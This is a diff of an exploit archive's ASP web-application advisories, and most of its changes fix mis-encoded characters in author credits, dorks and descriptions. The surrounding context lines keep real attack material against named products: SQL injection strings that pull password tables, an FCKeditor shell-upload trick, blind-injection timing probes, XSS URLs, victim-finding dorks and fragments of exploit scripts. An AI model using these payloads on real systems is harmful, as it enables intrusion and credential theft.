 $r = $res->content;
-$r =~ tr/[\n]/[鷯/;
+$r =~ tr/[\n]/[ê]/;
 
 if (@ARGV[4] eq "-r")
 {

platforms/asp/webapps/14155.txt

@@ -20,7 +20,7 @@ http://address/Portal/Research/ResearchPlan/UserStart.aspx
 'or 1=utl_inaddr.get_host_address((select banner from v$version where rownum=1))--
 
 ====================================================================================
-Dork: just search for "????"
+Dork: just search for "سیدا"
 
 ====================================================================================
 ~Blackout Frenzy  [http://b0f.ir]

platforms/asp/webapps/14461.txt

@@ -1,5 +1,5 @@
 ===================================================
-AKY Blog SQL ?njection 
+AKY Blog SQL İnjection 
 ===================================================
  
 Author : Madconfig

platforms/asp/webapps/14870.txt

@@ -149,7 +149,7 @@ As a result you can input value for Bypass filters and access critical informati
 
 After that results will be shown in DataGrid in Page.
 
-With another value, we can retrieve Information’s of Users:
+With another value, we can retrieve Information’s of Users:
 
 AddExtraSQL:1=1/**/Union/**/s;e;l;e;c;t/**/Name,Password,Email,UserID,2,Salt,1/1/1900,3,user,NEWID(),user/**/f;r;o;m/**/rb_users;-;-/**/sp_password
 

platforms/asp/webapps/15185.txt

@@ -3,7 +3,7 @@ http://cloudscan.blogspot.com/2010/10/vendor-smartertoolscom-smartermail-7x.html
 ########################################################################
 # Vendor: smartertools.com SmarterMail 7.x (7.2.3925)
 # Date: 2010-10-01
-# Author : David Hoyt (sqlhacker) – Hoyt LLC
+# Author : David Hoyt (sqlhacker) – Hoyt LLC
 # Contact : h02332@gmail.com
 # Home : http://cloudscan.me
 # Dork : insite: SmarterMail Enterprise 7.1

platforms/asp/webapps/15189.txt

@@ -1,7 +1,7 @@
 ########################################################################
 # Vendor: smartertools.com SmarterMail 7.x (7.2.3925)
 # Date: 2010-10-01
-# Author : David Hoyt (sqlhacker) – Hoyt LLC
+# Author : David Hoyt (sqlhacker) – Hoyt LLC
 # Contact : h02332@gmail.com
 # Home : http://cloudscan.me
 # Dork : insite: SmarterMail Enterprise 7.2

platforms/asp/webapps/15191.txt

@@ -10,7 +10,7 @@ TradeMC E-Ticaret - (SQLi/XSS) Multiple Vulnerabilities
 ~Web App. : TradeMC E-Ticaret
 ~Software: http://www.trademc.net/
 ~Vulnerability Style : SQL-i (XSS) Multiple
-~Google Keywords : "TradeMC Tarafından Hazırlanmıştır"
+~Google Keywords : "TradeMC Tarafýndan Hazýrlanmýþtýr"
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 Meterials : SQLInjection TOOL or Table name Bruteforcer
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

platforms/asp/webapps/15448.txt

@@ -8,7 +8,7 @@
 # EDB-ID: 5765 (only 1 SQL injection)
 
 
-# Ariko-Security: Security Audits , Audyt bezpiecze?stwa
+# Ariko-Security: Security Audits , Audyt bezpieczeństwa
 # Advisory: 745/2010
 
 ============ { Ariko-Security - Advisory #1/11/2010 } =============

platforms/asp/webapps/15597.txt

@@ -1,26 +1,26 @@
 ============================================================================== 
  
-        [»] Acidcat CMS v 3.3 (fckeditor) Shell Upload Vulnerability
+        [»] Acidcat CMS v 3.3 (fckeditor) Shell Upload Vulnerability
  
 ============================================================================== 
  
-    [»] Title   :           [ Acidcat CMS v 3.x (fckeditor) Shell Upload Vulnerability ]
+    [»] Title   :           [ Acidcat CMS v 3.x (fckeditor) Shell Upload Vulnerability ]
  
-    [»] Script  :           [ Mini-NUKE v2.3  ] 
+    [»] Script  :           [ Mini-NUKE v2.3  ] 
  
-    [»] Language:           [ ASP ] 
+    [»] Language:           [ ASP ] 
  
-    [»] Download:           [ http://www.acidcat.com/default.asp?itemID=202&itemTitle=Download Free]
+    [»] Download:           [ http://www.acidcat.com/default.asp?itemID=202&itemTitle=Download Free]
  
-    [»] Author  :           [ Net.Edit0r - black.hat.tm@gmail.com }
+    [»] Author  :           [ Net.Edit0r - black.hat.tm@gmail.com }
  
-    [»] My Home :           [ ajaxtm.com and datacoders.org ] 
+    [»] My Home :           [ ajaxtm.com and datacoders.org ] 
  
-    [»] Date    :           [ 2010-11-23 ] 
+    [»] Date    :           [ 2010-11-23 ] 
   
-    [»] Version :           [ 3.3.X and 3.2.x ]
+    [»] Version :           [ 3.3.X and 3.2.x ]
 
-    [»] Dork    :           [ "Powered by Acidcat CMS " ]
+    [»] Dork    :           [ "Powered by Acidcat CMS " ]
 
    
  
@@ -30,15 +30,15 @@
 ===[ Exploit ]=== 
  
  
-  [»] http://server/admin/fckeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/asp/connector.asp 
+  [»] http://server/admin/fckeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/asp/connector.asp 
  
-  [»] asp renamed via the .asp;.jpg (shell.asp;.jpg)
+  [»] asp renamed via the .asp;.jpg (shell.asp;.jpg)
 
 ===[ Upload To ]===
 
-  [»] http://server/read_write/file/[Shell] 
+  [»] http://server/read_write/file/[Shell] 
 
-  [»] http://server/public/File/[Shell]
+  [»] http://server/public/File/[Shell]
 
 
 Greetz : HUrr!c4nE , H-SK33PY , Cair3x , B3hz4d , Skitt3r , M4hd1

platforms/asp/webapps/15653.txt

@@ -57,7 +57,7 @@ files of the BugTracker.NET:
 
 6. *Credits*
 
-This vulnerability was discovered and researched by Damián Saura
+This vulnerability was discovered and researched by Damián Saura
 [http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=researcher&name=Damian_Saura]
 and Alejandro Frydman from Core Security Technologies.
 

platforms/asp/webapps/15688.txt

@@ -3,7 +3,7 @@
 # Date: 05-12-2010
 # Vendor or Software Link: http://www.hotwebscripts.co.uk/
 # Category:WebApp
-# Price: £150
+# Price: £150
 # Contact: R4dc0re@yahoo.fr
 # Website: www.1337db.com
 # Greetings to: R0073r(1337db.com), L0rd CrusAd3r,Sid3^effects and to rest of the 1337db members 

platforms/asp/webapps/15777.txt

@@ -8,16 +8,16 @@
 +Tests : Windows XP SP 3 and Backtrack4 any other OS
 +Discovered by DeadLy DeMon
 + Cyber - Warrior TIM =>> *www.cyber-warrior.org*
-+Greetz to All System-Hacker, BlackApple , F0RTYS3V3N , HUNT3R , ?air-ul
++Greetz to All System-Hacker, BlackApple , F0RTYS3V3N , HUNT3R , Şair-ul
 Cihad and All KinqSqlZCrew
 Members
 ---------------------------------------------------------------------------------------
 
-Var m? içinizde beni tan?yan?
+Var mı içinizde beni tanıyan?
-Ya?anmadan çözülemeyen s?r benim.
+Yaşanmadan çözülemeyen sır benim.
-Kalmasada ?öhretimi duymayan,
+Kalmasada şöhretimi duymayan,
-Kimli?imi tarif etmek zor benim..
+Kimliğimi tarif etmek zor benim..
-                                    Akl?n?za Geliriz Akl?n?z Gider...
+                                    Aklınıza Geliriz Aklınız Gider...
 KinqSqlZ Crew Akar...
 ----------------------------------------------------------------------------------------
 

platforms/asp/webapps/1700.pl

@@ -45,7 +45,7 @@ sub exploit ()
   print $as "Connection: close\n\n";
   print "- Connected...\r\n";
   while ($answer = <$as>) {
-    if ($answer =~ /class=\"tablo_baslik\"><b>» (.*?)<\/b><\/td>/) {
+    if ($answer =~ /class=\"tablo_baslik\"><b>» (.*?)<\/b><\/td>/) {
       if ($1 == $ARGV[2]) {
         print "- Exploit succeed! Getting USERID: $ARGV[2]'s credentials\r\n";
       }

platforms/asp/webapps/17011.txt

@@ -12,7 +12,7 @@
 	- Soroush Dalili (Irsdl [at] yahoo [dot] com) (secproject.com)
 
 # Description:
-Regarding attack technique [1], it is possible to bypass the security protections of ?/download.aspx? in Douran Portal and download the hosted files.
+Regarding attack technique [1], it is possible to bypass the security protections of “/download.aspx” in Douran Portal and download the hosted files.
 
 # PoC(s): 
 Try this first and see the access denied error: http://[HOST]/download.aspx?FilePathAttach=/&FileNameAttach=web.config&OriginalAttachFileName=secretfile.txt
@@ -22,7 +22,7 @@ http://[HOST]/download.aspx?FilePathAttach=/&FileNameAttach=web.config%20&Origin
 http://[HOST]/download.aspx?FilePathAttach=/&FileNameAttach=wEB.CoNfiG&OriginalAttachFileName=secretfile.txt
 
 # Reference:
-[1] Unrestricted File Download V1.0 ? Windows Server, (URL: http://soroush.secproject.com/blog/2011/01/unrestricted_file_download_v1_0/)
+[1] Unrestricted File Download V1.0 – Windows Server, (URL: http://soroush.secproject.com/blog/2011/01/unrestricted_file_download_v1_0/)
 
 # Important Notes:
 - Vendor did not respond to the email as well as the phone. As there is not any contact form or email address in the website, we have used all the emails which had been found by searching in Google such as support, info, and so on.

platforms/asp/webapps/17015.txt

@@ -7,7 +7,7 @@
 # Software Link: http://www.element-it.com/downloadfile.aspx?type=pow
 # Demo:
 http://site.com/Examples/PowUpload/Simpleupload.htm
-<EFBFBD>
+ 
 [Comment]
 Agradezco a mis amigos: Hernan Jais, Alfonso Cuevas, Inyexion,
 Login-Root, KikoArg, Ricota,

platforms/asp/webapps/17016.txt

@@ -6,7 +6,7 @@
 # Software: EAFlashUpload v 2.5
 # Software Link: http://www.easyalgo.com/downloads.aspx#EAFlashUpload
 # Demo: http://www.site.com/examples/eaflashupload/simpleupload.aspx
-<EFBFBD>
+ 
 [Comment]
 Agradezco a mis amigos: Hernan Jais, Alfonso Cuevas, Inyexion,
 Login-Root, KikoArg, Ricota,

platforms/asp/webapps/17242.txt

@@ -27,7 +27,7 @@ e-mail          : root[at]exploit-id.com
 # Category:: webapps
 # Google dork: http://www.google.com/#q=intext%3A%22Powered+by+dhtml-menu-builder.com%22+inurl%3A.asp%3Fid%3D&hl=en&biw=1280&bih=709&prmd=ivns&ei=xES_TdTxI4-58gPk_ozUBQ&start=20&sa=N&fp=4fb1180a34b58d1d
 #Vendor: http://dhtml-menu-builder.com
-# Tested on: [Windows Vista Edition Intégrale]
+# Tested on: [Windows Vista Edition Intégrale]
 ####
 
 ||>> Special Thanks To: All Exploit-Id Team

platforms/asp/webapps/17711.txt

@@ -7,13 +7,13 @@
 ############################################## 
 ===[ POC ]===
  
-[»] http://website/[path]/careers-detail.asp?id=[SQL]
+[»] http://website/[path]/careers-detail.asp?id=[SQL]
 
-[»] http://website/[path]/publications.asp?type=[SQL]
+[»] http://website/[path]/publications.asp?type=[SQL]
 
-[»] http://website/[path]/WhatNew.asp?page=&id=[SQL]
+[»] http://website/[path]/WhatNew.asp?page=&id=[SQL]
 
-[»] http://website/[path]/gallery.asp?cid=[SQL]
+[»] http://website/[path]/gallery.asp?cid=[SQL]
 ##############################################
 
 Greats T0 :

platforms/asp/webapps/17733.txt

@@ -65,12 +65,12 @@ http://[URL]/archive.aspx?sid=19'; IF SYSTEM_USER='sa' waitfor delay
 '00:00:10'--&siteid=1
 
 Binary Search Exploits:
-http://[URL]/about.aspx?siteid=1'; IF ASCII(SUBSTRING((?),i,1)) > k 
+http://[URL]/about.aspx?siteid=1'; IF ASCII(SUBSTRING((<EFBFBD>),i,1)) > k 
 waitfor delay
 '00:00:10'--
 
 Note: In last POC, i is the i-th byte returned by the one-row subquery 
-(?) and k is the
+(<EFBFBD>) and k is the
 current middle value of the binary search.
 
 -------------

platforms/asp/webapps/1834.asp

@@ -23,15 +23,15 @@ http://[target]/[path]/topics.asp?catid=30&forumname=%22%3E%3Cscript%3Ealert%28%
 
 TURKISH
 # Ba.l.k          :   Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities
-# Sözcük[Arama]   :   "powered by phpmydirectory"
+# Sözcük[Arama]   :   "powered by phpmydirectory"
-# Aç... Bulan     :   ajann
+# Aç... Bulan     :   ajann
-# Aç.k bulunan dosyalar;
+# Aç.k bulunan dosyalar;
 
 SQL INJECT.ON--------------------------------------------------------
 ###  http://[target]/[path]/userview.asp?startletter=SQL SORGUNUZ
 ###  http://[target]/[path]/topics.asp?catid=1'SQL SORGUNUZ =>catid=De.i.ken
 
-Örnek:
+Örnek:
 http://[target]/[path]/topics.asp?catid=1 union+select+0,password,0,0,0,0,0,0,0,0+from+tbl_forum_users
 
 XSS--------------------------------------------------------
@@ -39,7 +39,7 @@ XSS--------------------------------------------------------
 ###  http://[target]/[path]/userview.asp?startletter=XSS KODLARINIZ
 ### http://[target]/[path]/topics.asp?catid=30&forumname=XSS KODLARINIZ
 
-Örnek:
+Örnek:
 http://[target]/[path]/topics.asp?catid=30&forumname=%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E Ekrana X uyar.s. c.kar.cakt.r.
 
 Ac.klama:

platforms/asp/webapps/1837.pl

@@ -55,7 +55,7 @@ sub getsession ()
   print "- Connected...\r\n";
   while ($answer = <$mns>) { 
     if ($answer =~ /Set-Cookie: (.*?) path=\//) { $mncookie = $mncookie.$1; }
-    if ($answer =~ /Güvenlik Kodunuz<\/td><td width=\"50%\"><b>(.*?)<\/b><\/td>/) { $mngvn=$1;doregister(); }
+    if ($answer =~ /Güvenlik Kodunuz<\/td><td width=\"50%\"><b>(.*?)<\/b><\/td>/) { $mngvn=$1;doregister(); }
   }
   #if you are here...
   die "- Exploit failed\r\n";
@@ -191,7 +191,7 @@ sub doadmin ()
       print "- You can login with password $mnpass on $mnlreq\r\n";
       exit();
     }
-    if ($answer =~ /Üyeler Açýktýr/) { 
+    if ($answer =~ /Üyeler Açýktýr/) { 
       print "- Exploit failed\r\n";
       exit();
     }

platforms/asp/webapps/1849.htm

@@ -17,10 +17,10 @@ Mail
 <a href="mailto:mail@domain.com" target="_blank">mail@domain.com</a></font><br>
 
 <font face="Verdana" size="2" color="#FF0000"><b>User 
-Ýd            
+Ýd            
 :  </b></font>
 <input type="text" name="id" value="" size="20">
-<font size="1" color="#C0C0C0" face="Arial">  Example: Ýd:1 
+<font size="1" color="#C0C0C0" face="Arial">  Example: Ýd:1 
 Admin</font><br>
 <font face="Verdana" size="2" color="#FF0000"><b>User Country  :  
 </b>

platforms/asp/webapps/18802.txt

@@ -16,16 +16,16 @@ VL-ID:
 
 Introduction:
 =============
-XPhone Unified Communications 2011 ist die leistungsstärkste Telefonie- und Kommunikationslösung von C4B. 
+XPhone Unified Communications 2011 ist die leistungsstärkste Telefonie- und Kommunikationslösung von C4B. 
-Sie ist leicht zu bedienen und verbessert die Arbeitsabläufe in Unternehmen. Die Lösung integriert sich 
+Sie ist leicht zu bedienen und verbessert die Arbeitsabläufe in Unternehmen. Die Lösung integriert sich 
 nahtlos in bestehende Anwendungen und nutzt die vorhandene Telefonanlage und IT-Infrastruktur. Dabei 
 werden die verschiedensten Kommunikationsmittel wie Telefon, Handy, Fax, Voicemail, SMS und Instant Messaging 
-vereint und mit Präsenzinformationen kombiniert. Die Software stellt leistungsfähige Telefonie-Funktionen in 
+vereint und mit Präsenzinformationen kombiniert. Die Software stellt leistungsfähige Telefonie-Funktionen in 
 praktisch allen Anwendungen wie z.B. Microsoft Outlook, Lotus Notes, Warenwirtschaftssystemen (ERP),
 
-Kundendatenbanken (CRM) oder dem Webbrowser zur Verfügung. Die Verknüpfung von Telefonereignissen mit bestimmten 
+Kundendatenbanken (CRM) oder dem Webbrowser zur Verfügung. Die Verknüpfung von Telefonereignissen mit bestimmten 
 Aktionen, z.B. Starten von Anwendungen, automatische Erstellung von Briefen oder Faxe u.v.m, verbessert die 
-Arbeitsabläufe in Unternehmen spürbar.
+Arbeitsabläufe in Unternehmen spürbar.
 
 (Copy of the Vendor Homepage: http://www.c4b.de )
 
@@ -106,7 +106,7 @@ may not apply. Any modified copy or reproduction, including partially usages, of
 Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of 
 other media, are reserved by Vulnerability-Lab or its suppliers.
 
-Copyright © 2012 Vulnerability-Lab
+Copyright © 2012 Vulnerability-Lab
 
 -- 
 VULNERABILITY RESEARCH LABORATORY TEAM

platforms/asp/webapps/1900.txt

@@ -3,13 +3,13 @@
 #Original advisory: http://www.nukedx.com/?viewdoc=42
 #Title: MaxiSepet <= 1.0 (link) SQL Injection Vulnerability.
 
-#Dork: "Copyright MaxiSepet ©"
+#Dork: "Copyright MaxiSepet ©"
 
 #How: Parameter link did not sanitized properly.
 
 #Example: GET -> http://www.victim.com/maxisepetdirectory/default.asp?git=11&link=SQL
 
-#Example: GET -> http://www.victim.com/maxisepetdirectory/default.asp?git=11&link=-1+UNION+SELECT+concat('Üye%20adi:%20<b>',email,'</b><br>','Þifre:%20<b>',sifre,'</b>')+from+uye+ORDER BY email ASC
+#Example: GET -> http://www.victim.com/maxisepetdirectory/default.asp?git=11&link=-1+UNION+SELECT+concat('Üye%20adi:%20<b>',email,'</b><br>','Þifre:%20<b>',sifre,'</b>')+from+uye+ORDER BY email ASC
 
 # nukedx.com [2006-06-11]
 

platforms/asp/webapps/21272.txt

@@ -150,7 +150,7 @@ retrieve users credential from user database requests
                                                       \\\
                                             .------.  /// 
                                             (:::::::)(_)():-
-                                            `------ｰ  \\\
+                                            `------°  \\\
                                       Exploit sent    ///
               
 '."\n";

platforms/asp/webapps/23005.txt

@@ -13,10 +13,10 @@ the protection and upload a file with any extension.
 
 Note: Quick patch for FCKEditor 2.6.8 File Upload Bypass:
 
-In “config.asp”, wherever you have:
+In “config.asp”, wherever you have:
 
-      ConfigAllowedExtensions.Add    “File”,”Extensions Here”
+      ConfigAllowedExtensions.Add    “File”,”Extensions Here”
 
 Change it to:
 
-      ConfigAllowedExtensions.Add    “File”,”^(Extensions Here)$”
+      ConfigAllowedExtensions.Add    “File”,”^(Extensions Here)$”

platforms/asp/webapps/2306.txt

@@ -1,6 +1,6 @@
 ################################################################################
 ##                                                                            ##
-##  ©ZIXForum 1.12 <= "RepId" Remote SQL Injection                            ##
+##  ©ZIXForum 1.12 <= "RepId" Remote SQL Injection                            ##
 ##  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -       ##
 ##  Credit by        |  Chironex Fleckeri                                     ##
 ##  Mail             |  ChironeX.FleckeriX@Gmail.Com                          ##

platforms/asp/webapps/23696.pl

@@ -31,7 +31,7 @@ print "|                                                            |\n";
 print "|   PROOF OF CONCEPT COOKIE ACCOUNT HIJACK                   |\n";
 print "|   Usage:Asp-POC.pl [host] [directorio] [usuario] [fichero] |\n";
 print "|                                                            |\n";
-print "|   By: Manuel L?pez #IST                                    |\n";
+print "|   By: Manuel L<EFBFBD>pez #IST                                    |\n";
 print "|____________________________________________________________|\n";
 print "\n\n";
 exit(1);

platforms/asp/webapps/2592.htm

@@ -1,8 +1,8 @@
 <!--
 # Title  :   Active Bulletin Board v1.1 beta2 (doprofiledit.asp) Remote User Pass Change Exploit
 # Author :   ajann
-# Dork   :   "Forum Active Bulletin Board version 1.1 béta 2"
+# Dork   :   "Forum Active Bulletin Board version 1.1 béta 2"
-# Greetz :   Ramazan'iniz,Mübarek,Olsun,Tüm,Müslüman,Alemi|Geç,Oldu,Biraz :)
+# Greetz :   Ramazan'iniz,Mübarek,Olsun,Tüm,Müslüman,Alemi|Geç,Oldu,Biraz :)
 
 [Code]]]
 -->

platforms/asp/webapps/2642.asp

@@ -10,7 +10,7 @@
 '[Author   : ajann
 '[Contact    : :(
 '[ExploitName: exploit1.asp
-'[Greetz To: ## Tüm Müslüman Aleminin Ramazan Bayrami MUBAREK Olsun , Bir Daha Nasib Olur İnsallah ##
+'[Greetz To: ## Tüm Müslüman Aleminin Ramazan Bayrami MUBAREK Olsun , Bir Daha Nasib Olur Ýnsallah ##
 
 '[Note : exploit file name =>exploit1.asp
 '[Using : Write Target and ID after Submit Click

platforms/asp/webapps/2762.asp

@@ -13,9 +13,9 @@
 
 '[Note : exploit file name =>exploit1.asp
 '[Using : Write Target and ID after Submit Click
-'[Using : Tr:Alınan Sifreyi Perl scriptinde cözün.
+'[Using : Tr:Alýnan Sifreyi Perl scriptinde cözün.
 '[Using : Tr:Scriptin Tr Dilinde bu exploitle bilgileri alamassiniz,manuel cekebilirsiniz
-'[Using : Tr:Kimsenin boyle yapicak kadar seviyesiz oldunu düsünmüyorum.
+'[Using : Tr:Kimsenin boyle yapicak kadar seviyesiz oldunu düsünmüyorum.
 '===============================================================================================
 'use sub decrypt() from http://www.milw0rm.com/exploits/1597 to decrypt /str0ke
 

platforms/asp/webapps/2781.txt

@@ -17,7 +17,7 @@ vulnerables fields:
 - Comments
 
 
-laurent gaffié & benjamin mossé
+laurent gaffié & benjamin mossé
 http://s-a-p.ca/
 contact: saps.audit@gmail.com
 

platforms/asp/webapps/2782.txt

@@ -15,7 +15,7 @@ variables:
 Hpecs_Find=maingroup&searchstring='[sql]
  ( or just post your query in the search engine ... )
 
-laurent gaffié & benjamin mossé
+laurent gaffié & benjamin mossé
 http://s-a-p.ca/
 contact: saps.audit@gmail.com
 

platforms/asp/webapps/29216.html

@@ -1,6 +1,6 @@
 source: http://www.securityfocus.com/bid/21398/info
 
-Aspee Ziyaretçi Defteri is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. 
+Aspee Ziyaretçi Defteri is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. 
 
 A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
 

platforms/asp/webapps/29240.txt

@@ -1,6 +1,6 @@
 source: http://www.securityfocus.com/bid/21511/info
 
-Ã?ilem Haber Free Edition is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. 
+Ã?ilem Haber Free Edition is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. 
 
 An attacker may leverage this issue to have arbitrary script code execute in the browser of an unsuspecting user. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
 

platforms/asp/webapps/2962.txt

@@ -8,7 +8,7 @@
 
 # Found By : ShaFuck31
 
-# Thanks : | Dekolax | The RéD | DesquneR | f1r3b0y | BaZaL | SaboTaqe | ST@ReXT | BLaSTER | UNiKnoX |
+# Thanks : | Dekolax | The RéD | DesquneR | f1r3b0y | BaZaL | SaboTaqe | ST@ReXT | BLaSTER | UNiKnoX |
 
 # Vulnerable file : down.asp
 

platforms/asp/webapps/29675.txt

@@ -24,12 +24,12 @@ PDF: http://security-assessment.com/files/documents/advisory/Kaseya%20File%20Upl
 +-----------+ 
 
 Kaseya 6.3 suffers from an Arbitrary File Upload vulnerability that can be leveraged to gain remote code 
-execution on the Kaseya server. The code executed in this way will run with a local IUSR account’s privileges. 
+execution on the Kaseya server. The code executed in this way will run with a local IUSR account’s privileges. 
 The vulnerability lies within the /SystemTab/UploadImage.asp file. This file constructs a file object on disk using 
 user input, without first checking if the user is authenticated or if input is valid. The application preserves the 
 file name and extension of the upload, and allows an attacker to traverse from the default destination directory. 
 Directory traversal is not necessary to gain code execution however, as the default path lies within the 
-application’s web-root. 
+application’s web-root. 
 
 
 +------------+ 

platforms/asp/webapps/30141.txt

@@ -1,9 +1,9 @@
 source: http://www.securityfocus.com/bid/24288/info
 
-Hünkaray Okul Portalý is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+Hünkaray Okul Portalý is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
 
 An attacker can exploit this issue by manipulating the SQL query logic to carry out unauthorized actions on the underlying database.
 
-Hünkaray Okul Portalý 1.1 is vulnerable to this issue.
+Hünkaray Okul Portalý 1.1 is vulnerable to this issue.
 
 http://www.example.com/okul/haberoku.asp?id=11%20union+select+0,sifre,kullaniciadi,3,4+from+admin